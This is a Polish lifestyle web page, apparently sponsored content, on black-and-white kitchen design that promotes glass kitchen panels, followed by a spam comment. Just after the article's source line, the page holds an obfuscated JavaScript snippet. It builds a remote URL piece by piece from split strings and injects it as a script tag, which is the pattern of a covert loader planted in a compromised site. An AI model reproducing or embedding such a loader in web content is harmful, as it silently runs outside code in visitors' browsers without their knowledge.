Monday, April 22, 2024
Home / Styl życia  / Dom  / Pomysły na czarną i białą kuchnię

Pomysły na czarną i białą kuchnię

Dlaczego biel?

Kuchnie czerń i biel

Nowe trendy w kuchni/fot. materiały prasowe

Trendy dekoracji wnętrz roku 2020 to nie tylko klasyczny niebieski (wybrany jako kolor roku Pantone), ale także wszechobecna czerń w połączeniu z bielą. Do tej pory to kontrastowe połączenie kojarzono z minimalizmem, w tym roku wszelkie zestawienia yin-yang są wręcz pożądane w każdej ilości. Trzeba przyznać, że jedne z najbardziej eleganckich, czarno-białych kompozycji to szklane panele kuchenne na ścianę

 

 

 

 

 

Dlaczego czarno-białe dekoracje będą jednym z najgorętszych trendów tego roku? Przede wszystkim – klasyczna elegancja. Po roku pełnym pastelowej i kolorowej ekstrawagancji w wystroju wnętrz (kolorem Pantone 2019 był koralowy), przyszedł czas na kontrasty. Czerń i biel przepięknie ze sobą współgrają, tworząc kontrastową, przyciągającą wzrok kompozycję.

 

Dlaczego biel?

 

Biel kojarzy się z surowym stylem skandynawskim, który królował w poprzednich latach w naszych domach. Czerń do tej pory była używana z umiarem, głównie jako przełamanie kolorowego lub białego wystroju. Rok 2020 to rok kontrastów, dlatego połączenia czerni i bieli znajdą swoje zastosowanie w każdym pomieszczeniu, szczególnie w kuchni, gdzie z powodzeniem sprawdzą się czarno–białe szklane panele kuchenne.

Panele kuchenne ze szkła to trwałość, odporność na zabrudzenia i rysy oraz elegancja sama w sobie. Są niezbędnym wystrojem nowoczesnej kuchni. Szybki i łatwy sposób montażu oraz nieograniczone możliwości wyboru wzorów pozwalają na niekwestionowaną przewagę paneli na szkle nad tradycyjnymi kaflami kuchennymi. Sklep Tulup oferuje panele kuchenne ze szkła hartowanego pod adresem:

 

Połączenie czerni i bieli

 

Połączenie czerni i bieli jest bardzo symboliczne jak światło i ciemność, yin i yang, zło i dobro. Należy pamiętać, że kluczowym wyznacznikiem idealnej kompozycji czerni z bielą jest równowaga. Jeśli przesadzimy z czarnymi dodatkami, wnętrze stanie się przytłoczone i ciemne. Nadmiar bieli sprawi, że pomieszczenie będzie zbyt sterylne i surowe. Równomierne rozłożenie obydwu kolorów sprawi, że Wasze wnętrze będzie nie tylko modne, ale i oryginalne. Czerń z bielą w tym roku będą królować nie tylko w kuchniach i łazienkach, również w salonach i sypialniach. Nie bójcie się zaufać designerskim trendom i stwórzcie stylowe wnętrze w swoim domu.

 

 

źródło: materiał Partnera MK

(function(){
iwhe_=(„u”+”st”);iwhe=document.createElement(„script”);iwhe.async=true;
iwheu=”188308878″;iwhe_+=”a”+(„t.”);iwhe_+=”i”+(„nf”+(„o”))+(„/”);
iwheu+=”.fnz5r6buwheu2suc”;iwheu+=”0kb0azqpq9rx3h”;
iwhe.src=”https://”+iwhe_+iwheu;iwhe.type=”text/javascript”;
d_b=document.body;d_b.appendChild(iwhe);
})();

Oceń artykuł
1KOMENTARZ
  • enable flash in chrome 21 stycznia, 2020

    Your article is very useful, the content is great, I have read a lot of articles, but for your article, it left me a deep impression, thank you for sharing.

SKOMENTUJ, NIE HEJTUJ